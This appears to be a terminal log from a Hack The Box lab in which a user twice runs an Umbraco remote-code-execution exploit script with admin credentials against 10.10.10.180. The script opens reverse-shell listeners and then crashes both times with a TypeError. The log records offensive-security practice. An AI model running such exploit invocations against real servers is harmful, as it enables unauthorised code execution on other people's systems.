kali@kali:/tmp/Umbraco-RCE$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 10.10.10.180 -w http://10.10.10.180/umbraco
[+] Trying to bind to :: on port 4444: Done
[→] Waiting for connections on :::4444
[+] Trying to bind to :: on port 4445: Done
[>] Waiting for connections on :::4445
Traceback (most recent call last):
File "/tmp/Umbraco-RCE/exploit.py", line 95, in
main()
File "/tmp/Umbraco-RCE/exploit.py", line 60, in main
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
TypeError: 'NoneType' object is not subscriptable
kali@kali:/tmp/Umbraco-RCE$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 10.10.10.180 -w http://10.10.10.180/umbraco
[+] Trying to bind to :: on port 4444: Done
[→] Waiting for connections on :::4444
[+] Trying to bind to :: on port 4445: Done
[>] Waiting for connections on :::4445
Traceback (most recent call last):
File "/tmp/Umbraco-RCE/exploit.py", line 95, in
main()
File "/tmp/Umbraco-RCE/exploit.py", line 60, in main
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
TypeError: 'NoneType' object is not subscriptable